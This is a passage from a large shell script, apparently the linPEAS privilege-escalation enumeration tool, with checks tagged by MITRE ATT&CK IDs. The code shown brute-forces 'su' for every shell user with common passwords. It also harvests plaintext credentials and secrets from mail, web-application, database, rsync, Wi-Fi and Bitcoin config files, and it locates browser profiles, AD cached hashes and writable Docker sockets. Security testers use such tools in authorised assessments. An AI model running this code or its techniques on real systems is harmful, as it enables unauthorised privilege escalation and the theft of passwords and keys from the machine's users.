| sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," 9890 echo "" 9891 fi 9892 done 9893 fi 9894 echo "" 9895 9896 fi 9897 9898 if check_mitre_filter "T1201"; then 9899 if [ "$EXTRA_CHECKS" ]; then 9900 print_2title "Password policy" "T1201" 9901 grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" 9902 echo "" 9903 if [ "$MACPEAS" ]; then 9904 print_2title "Relevant last user info and user configs" "T1201" 9905 defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null 9906 echo "" 9907 print_2title "Guest user status" "T1201" 9908 sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," 9909 sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," 9910 sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," 9911 echo "" 9912 fi 9913 fi 9914 9915 fi 9916 9917 if check_mitre_filter "T1110.001"; then 9918 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then 9919 print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC 9920 POSSIBE_SU_BRUTE=$(check_if_su_brute); 9921 if [ "$POSSIBE_SU_BRUTE" ]; then 9922 SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) 9923 printf "%s\n" "$SHELLUSERS" | while read u; do 9924 echo " Bruteforcing user $u..." 9925 su_brute_user_num "$u" $PASSTRY 9926 done 9927 else 9928 printf $GREEN"It's not possible to brute-force su.\n\n"$NC 9929 fi 9930 else 9931 print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC 9932 fi 9933 print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC 9934 9935 fi 9936 9937 if check_mitre_filter "T1069.001"; then 9938 print_2title "Actual Group Memberships via newgrp" "T1069.001" 9939 # Skip this probe when running as root to avoid root-only newgrp behavior 9940 if [ "${IAMROOT:-0}" != "1" ]; then 9941 ActualGroup="|" 9942 while IFS=: read -r groupname _ gid _; do 9943 result=$(timeout 1 sh -c "echo id | newgrp \"$groupname\"" 2>/dev/null) 9944 if echo "$result" | grep -q "uid="; then 9945 if ! echo "${Groups}|" | grep -Fq "|${groupname}|"; then 9946 ActualGroup="${ActualGroup}${groupname}|" 9947 echo "Accessible group not shown in id: $groupname (gid=$gid)" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$groupsB,${SED_RED},g" 9948 fi 9949 fi 9950 done < /etc/group 9951 echo "" 9952 fi 9953 9954 fi 9955 9956 fi 9957 9958 fi 9959 echo '' 9960 echo '' 9961 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 9962 9963 if echo $CHECKS | grep -q software_information; then 9964 if check_mitre_filter "T1082,T1587.001,T1574,T1552.001,T1552.005,T1539,T1217,T1003.003,T1613,T1068,T1555.001,T1558.003,T1190,T1552.004,T1556.003,T1505.001,T1611,T1556,T1563,T1021.004"; then 9965 print_title "Software Information" 9966 if check_mitre_filter "T1082"; then 9967 if ! [ "$SEARCH_IN_FOLDER" ]; then 9968 print_2title "Useful software" "T1082" 9969 for t in $USEFUL_SOFTWARE; do command -v "$t" || echo -n ''; done 9970 echo "" 9971 fi 9972 9973 fi 9974 9975 if check_mitre_filter "T1587.001"; then 9976 if ! [ "$SEARCH_IN_FOLDER" ]; then 9977 print_2title "Installed Compilers" "T1587.001" 9978 (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); 9979 echo "" 9980 if [ "$(command -v pkg 2>/dev/null || echo -n '')" ]; then 9981 print_2title "Vulnerable Packages" "T1587.001" 9982 pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" 9983 echo "" 9984 fi 9985 if [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then 9986 print_2title "Brew Installed Packages" "T1587.001" 9987 brew list 9988 echo "" 9989 fi 9990 fi 9991 9992 fi 9993 9994 if check_mitre_filter "T1574"; then 9995 if [ "$MACPEAS" ]; then 9996 print_2title "Writable Installed Applications" "T1574" 9997 system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do 9998 if [ -w "$f" ]; then 9999 echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" 10000 fi 10001 done 10002 system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do 10003 if [ -w "$f" ]; then 10004 echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" 10005 fi 10006 done 10007 fi 10008 10009 fi 10010 10011 if check_mitre_filter "T1552.001"; then 10012 if [ "$PSTORAGE_APACHE_NGINX" ] || [ "$DEBUG" ]; then 10013 print_2title "Analyzing Apache-Nginx Files (limit 70)" 10014 echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" 10015 echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)" 10016 if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null; fi 10017 if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi 10018 print_3title 'PHP exec extensions' 10019 if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|DocumentRoot|AllowOverride|ProxyPass|ProxyPassReverse|RemoteIPHeader|SetEnvIf.*X-Forwarded|ErrorDocument|server-status|command on,${SED_RED},g"; done; echo "";done; echo ""; 10020 if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|DocumentRoot|AllowOverride|ProxyPass|ProxyPassReverse|RemoteIPHeader|SetEnvIf.*X-Forwarded|ErrorDocument|server-status,${SED_RED},g"; done; echo ""; 10021 if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "php\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; 10022 if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|fastcgi_pass|alias|try_files|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo ""; 10023 if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|fastcgi_pass|alias|try_files|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo "";done; echo ""; 10024 fi 10025 10026 10027 fi 10028 10029 if check_mitre_filter "T1552.005"; then 10030 AWSVAULT="$(command -v aws-vault 2>/dev/null || echo -n '')" 10031 if [ "$AWSVAULT" ] || [ "$DEBUG" ]; then 10032 print_2title "Check aws-vault" "T1552.005" 10033 aws-vault list 10034 fi 10035 10036 fi 10037 10038 if check_mitre_filter "T1539,T1217"; then 10039 print_2title "Browser Profiles" "T1539,T1217" 10040 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#browser-data" 10041 echo "" 10042 for h in $HOMESEARCH; do 10043 [ -d "$h" ] || continue 10044 firefox_ini="$h/.mozilla/firefox/profiles.ini" 10045 if [ -f "$firefox_ini" ]; then 10046 print_3title "Firefox profiles ($h)" "T1539,T1217" 10047 awk -F= ' 10048 /^\[Profile/ { in_profile=1 } 10049 /^Path=/ { path=$2 } 10050 /^IsRelative=/ { isrel=$2 } 10051 /^$/ { 10052 if (path != "") { 10053 if (isrel == "1") { 10054 print base "/.mozilla/firefox/" path 10055 } else { 10056 print path 10057 } 10058 } 10059 path=""; isrel="" 10060 } 10061 END { 10062 if (path != "") { 10063 if (isrel == "1") { 10064 print base "/.mozilla/firefox/" path 10065 } else { 10066 print path 10067 } 10068 } 10069 } 10070 ' base="$h" "$firefox_ini" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," 10071 echo "" 10072 fi 10073 for chrome_base in "$h/.config/google-chrome" "$h/.config/chromium" "$h/.config/BraveSoftware/Brave-Browser" "$h/.config/microsoft-edge" "$h/.config/microsoft-edge-beta" "$h/.config/microsoft-edge-dev"; do 10074 if [ -d "$chrome_base" ]; then 10075 profiles=$(find "$chrome_base" -maxdepth 1 -type d \( -name "Default" -o -name "Profile *" \) 2>/dev/null) 10076 if [ "$profiles" ]; then 10077 print_3title "Chromium profiles ($chrome_base)" "T1539,T1217" 10078 printf "%s\n" "$profiles" | sed -${E} "s,.*,${SED_RED}," 10079 echo "" 10080 fi 10081 fi 10082 done 10083 done 10084 10085 fi 10086 10087 if check_mitre_filter "T1003.003"; then 10088 adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) 10089 if [ "$adhashes" ] || [ "$DEBUG" ]; then 10090 print_2title "Searching AD cached hashes" "T1003.003" 10091 ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null 10092 echo "" 10093 fi 10094 10095 fi 10096 10097 if check_mitre_filter "T1613"; then 10098 if ! [ "$SEARCH_IN_FOLDER" ]; then 10099 containerd=$(command -v containerd || echo -n '') 10100 containerd_cli=$(command -v ctr || echo -n '') 10101 nerdctl_cli=$(command -v nerdctl || echo -n '') 10102 crictl_cli=$(command -v crictl || echo -n '') 10103 if [ "$containerd" ] || [ "$containerd_cli" ] || [ "$nerdctl_cli" ] || [ "$crictl_cli" ] || [ "$DEBUG" ]; then 10104 print_2title "Checking if containerd/CRI tooling is available" "T1613" 10105 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/runtime-api-and-daemon-exposure.html" 10106 if [ "$containerd" ]; then 10107 echo "containerd was found in $containerd" | sed -${E} "s,.*,${SED_RED}," 10108 fi 10109 if [ "$containerd_cli" ]; then 10110 echo "ctr was found in $containerd_cli, you may be able to inspect or manage containerd content with it" | sed -${E} "s,.*,${SED_RED}," 10111 ctr image list 2>&1 10112 fi 10113 if [ "$nerdctl_cli" ]; then 10114 echo "nerdctl was found in $nerdctl_cli, you may be able to interact with containerd namespaces and containers with it" | sed -${E} "s,.*,${SED_RED}," 10115 nerdctl images 2>&1 10116 fi 10117 if [ "$crictl_cli" ]; then 10118 echo "crictl was found in $crictl_cli, you may be able to inspect CRI-managed containers with it" | sed -${E} "s,.*,${SED_RED}," 10119 crictl images 2>&1 10120 fi 10121 echo "" 10122 fi 10123 fi 10124 10125 fi 10126 10127 if check_mitre_filter "T1613"; then 10128 if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then 10129 print_2title "Searching docker files (limit 70)" "T1613" 10130 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/index.html" 10131 printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do 10132 ls -l "$f" 2>/dev/null 10133 if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then 10134 echo "Docker related socket ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," 10135 fi 10136 done 10137 echo "" 10138 fi 10139 10140 fi 10141 10142 if check_mitre_filter "T1552.001"; then 10143 # Needs testing 10144 dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) 10145 if [ "$dovecotpass" ] || [ "$DEBUG" ]; then 10146 print_2title "Searching dovecot files" "T1552.001" 10147 if [ -z "$dovecotpass" ]; then 10148 echo_not_found "dovecot credentials" 10149 else 10150 printf "%s\n" "$dovecotpass" | while read d; do 10151 df=$(echo $d |cut -d ':' -f1) 10152 dp=$(echo $d |cut -d ':' -f2-) 10153 echo "Found possible PLAIN text creds in $df" 10154 echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null 10155 done 10156 fi 10157 echo "" 10158 fi 10159 10160 fi 10161 10162 if check_mitre_filter "T1082,T1068"; then 10163 if ! [ "$SEARCH_IN_FOLDER" ]; then 10164 checkNeedrestartCVE202448990 10165 fi 10166 if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then 10167 print_2title "Analyzing MariaDB Files (limit 70)" 10168 if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*|local_infile.*,${SED_RED},g"; done; echo ""; 10169 if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g"; done; echo ""; 10170 fi 10171 10172 10173 if [ "$PSTORAGE_VARNISH" ] || [ "$DEBUG" ]; then 10174 print_2title "Analyzing Varnish Files (limit 70)" 10175 if ! [ "`echo \"$PSTORAGE_VARNISH\" | grep -E \"varnish$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "varnish"; fi; fi; printf "%s" "$PSTORAGE_VARNISH" | grep -E "varnish$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,varnish$,${SED_RED},"; find "$f" -name "default.vcl" | while read ff; do ls -ld "$ff" | sed -${E} "s,default.vcl,${SED_RED},"; done; echo "";find "$f" -name "secret" | while read ff; do ls -ld "$ff" | sed -${E} "s,secret,${SED_RED},"; done; echo "";done; echo ""; 10176 fi 10177 10178 10179 if [ "$PSTORAGE_APACHE_AIRFLOW" ] || [ "$DEBUG" ]; then 10180 print_2title "Analyzing Apache-Airflow Files (limit 70)" 10181 if ! [ "`echo \"$PSTORAGE_APACHE_AIRFLOW\" | grep -E \"airflow\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "airflow.cfg"; fi; fi; printf "%s" "$PSTORAGE_APACHE_AIRFLOW" | grep -E "airflow\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,airflow\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,access_control_allow_headers|access_control_allow_methods|access_control_allow_origins|auth_backend|backend.default|google_key_path.*|password|username|flower_basic_auth.*|result_backend.*|ssl_cacert|ssl_cert|ssl_key|fernet_key.*|tls_ca|tls_cert|tls_key|ccache|google_key_path|smtp_password.*|smtp_user.*|cookie_samesite|cookie_secure|expose_config|expose_stacktrace|secret_key|x_frame_enabled,${SED_RED},g"; done; echo ""; 10182 if ! [ "`echo \"$PSTORAGE_APACHE_AIRFLOW\" | grep -E \"webserver_config\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "webserver_config.py"; fi; fi; printf "%s" "$PSTORAGE_APACHE_AIRFLOW" | grep -E "webserver_config\.py$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,webserver_config\.py$,${SED_RED},"; done; echo ""; 10183 fi 10184 10185 10186 if [ "$PSTORAGE_X11" ] || [ "$DEBUG" ]; then 10187 print_2title "Analyzing X11 Files (limit 70)" 10188 if ! [ "`echo \"$PSTORAGE_X11\" | grep -E \"\.Xauthority$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".Xauthority"; fi; fi; printf "%s" "$PSTORAGE_X11" | grep -E "\.Xauthority$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.Xauthority$,${SED_RED},"; done; echo ""; 10189 fi 10190 10191 10192 if [ "$PSTORAGE_WORDPRESS" ] || [ "$DEBUG" ]; then 10193 print_2title "Analyzing Wordpress Files (limit 70)" 10194 if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; 10195 fi 10196 10197 10198 if [ "$PSTORAGE_DRUPAL" ] || [ "$DEBUG" ]; then 10199 print_2title "Analyzing Drupal Files (limit 70)" 10200 if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; 10201 fi 10202 10203 10204 if [ "$PSTORAGE_MOODLE" ] || [ "$DEBUG" ]; then 10205 print_2title "Analyzing Moodle Files (limit 70)" 10206 if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php"; fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; 10207 fi 10208 10209 10210 if [ "$PSTORAGE_TOMCAT" ] || [ "$DEBUG" ]; then 10211 print_2title "Analyzing Tomcat Files (limit 70)" 10212 if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; 10213 fi 10214 10215 10216 if [ "$PSTORAGE_MONGO" ] || [ "$DEBUG" ]; then 10217 print_2title "Analyzing Mongo Files (limit 70)" 10218 echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" 10219 if [ "$(command -v mongo)" ]; then echo "show dbs" | mongo 127.0.0.1 > /dev/null 2>&1;[ "$?" == "0" ] && echo "Possible mongo anonymous authentication" | sed -${E} "s,.*|kube,${SED_RED},"; fi 10220 if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; 10221 fi 10222 10223 10224 if [ "$PSTORAGE_ROCKETCHAT" ] || [ "$DEBUG" ]; then 10225 print_2title "Analyzing Rocketchat Files (limit 70)" 10226 if ! [ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s" "$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E} "s,mongodb://.*,${SED_RED},g"; done; echo ""; 10227 fi 10228 10229 10230 if [ "$PSTORAGE_SUPERVISORD" ] || [ "$DEBUG" ]; then 10231 print_2title "Analyzing Supervisord Files (limit 70)" 10232 if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; 10233 fi 10234 10235 10236 if [ "$PSTORAGE_CESI" ] || [ "$DEBUG" ]; then 10237 print_2title "Analyzing Cesi Files (limit 70)" 10238 if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; 10239 fi 10240 10241 10242 if [ "$PSTORAGE_RSYNC" ] || [ "$DEBUG" ]; then 10243 print_2title "Analyzing Rsync Files (limit 70)" 10244 if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; 10245 if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10246 fi 10247 10248 10249 if [ "$PSTORAGE_RPCD" ] || [ "$DEBUG" ]; then 10250 print_2title "Analyzing Rpcd Files (limit 70)" 10251 if ! [ "`echo \"$PSTORAGE_RPCD\" | grep -E \"rpcd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rpcd"; fi; fi; printf "%s" "$PSTORAGE_RPCD" | grep -E "rpcd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rpcd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.+|password.+,${SED_RED},g"; done; echo ""; 10252 fi 10253 10254 10255 if [ "$PSTORAGE_BITCOIN" ] || [ "$DEBUG" ]; then 10256 print_2title "Analyzing Bitcoin Files (limit 70)" 10257 if ! [ "`echo \"$PSTORAGE_BITCOIN\" | grep -E \"bitcoin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bitcoin.conf"; fi; fi; printf "%s" "$PSTORAGE_BITCOIN" | grep -E "bitcoin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bitcoin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user=.*|password=.*|auth=.*,${SED_RED},g"; done; echo ""; 10258 fi 10259 10260 10261 if [ "$PSTORAGE_HOSTAPD" ] || [ "$DEBUG" ]; then 10262 print_2title "Analyzing Hostapd Files (limit 70)" 10263 if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; 10264 fi 10265 10266 10267 if [ "$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then 10268 print_2title "Analyzing Wifi Connections Files (limit 70)" 10269 if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo ""; 10270 if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"wpa_supplicant$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wpa_supplicant"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "wpa_supplicant$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wpa_supplicant$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 